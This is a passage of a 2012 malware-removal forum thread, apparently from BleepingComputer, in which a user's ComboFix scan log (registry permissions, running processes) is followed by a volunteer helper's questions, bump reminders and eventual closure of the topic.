@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_233.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}]
@Denied: (A 2) (Everyone)
@="IFlashBroker4"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
@Denied: (A) (Everyone)
"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
"Key"="ActionsPane3"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:000000b5
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
------------------------ Other Running Processes ------------------------
.
c:\program files (x86)\Bonjour\mDNSResponder.exe
c:\windows\SysWOW64\PnkBstrA.exe
c:\program files (x86)\Motorola\MotoHelper\MotoHelperAgent.exe
.
**************************************************************************
.
Completion time: 2012-04-18 01:26:27 - machine was rebooted
ComboFix-quarantined-files.txt 2012-04-18 00:26
ComboFix2.txt 2012-04-17 23:51
ComboFix3.txt 2012-04-16 20:14
.
Pre-Run: 103,543,943,168 bytes free
Post-Run: 103,475,433,472 bytes free
.
- - End Of File - - 0BA67881C632FB676EEF869AF99E40A6

Thanks
Vincent

#8 gringo_pr

gringo_pr

    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Puerto rico
  • Local time:12:54 AM

Posted 17 April 2012 - 08:05 PM

In which browsers does this happen in - check all installed


gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here -->btn_donate_SM.gif<-- Don't worry every little bit helps.

Proud Graduate Of Malware Removal University

#9 gringo_pr

gringo_pr

    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Puerto rico
  • Local time:12:54 AM

Posted 19 April 2012 - 11:24 PM

Hello


Just checking in on you as it has been a couple of days since I have heard from you.

Are you having any troubles or just need more time?




Gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here -->btn_donate_SM.gif<-- Don't worry every little bit helps.

Proud Graduate Of Malware Removal University

#10 vinnie946

vinnie946
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:04:54 AM

Posted 20 April 2012 - 04:32 AM

Hi, I am abit busy right now and ill reply to you tonight.

Thanks

#11 gringo_pr

gringo_pr

    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Puerto rico
  • Local time:12:54 AM

Posted 20 April 2012 - 07:15 AM

no problem


gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here -->btn_donate_SM.gif<-- Don't worry every little bit helps.

Proud Graduate Of Malware Removal University

#12 gringo_pr

gringo_pr

    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Puerto rico
  • Local time:12:54 AM

Posted 23 April 2012 - 12:05 AM

Hello


Just checking in on you as it has been a couple of days since I have heard from you.

Are you having any troubles or just need more time?




Gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here -->btn_donate_SM.gif<-- Don't worry every little bit helps.

Proud Graduate Of Malware Removal University

#13 gringo_pr

gringo_pr

    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Puerto rico
  • Local time:12:54 AM

Posted 26 April 2012 - 01:01 AM

Hello

48 Hour bump

It has been more than 48 hours since my last post.

  • do you still need help with this?
  • do you need more time?
  • are you having problems following my instructions?
  • if after 48hrs you have not replied to this thread then it will have to be closed!

Gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here -->btn_donate_SM.gif<-- Don't worry every little bit helps.

Proud Graduate Of Malware Removal University

#14 gringo_pr

gringo_pr

    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Puerto rico
  • Local time:12:54 AM

Posted 28 April 2012 - 11:09 PM

Due to the lack of feedback, this topic is now closed.In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days. Please include a link to your topic in the Private Message. Thank you.
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here -->btn_donate_SM.gif<-- Don't worry every little bit helps.

Proud Graduate Of Malware Removal University




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users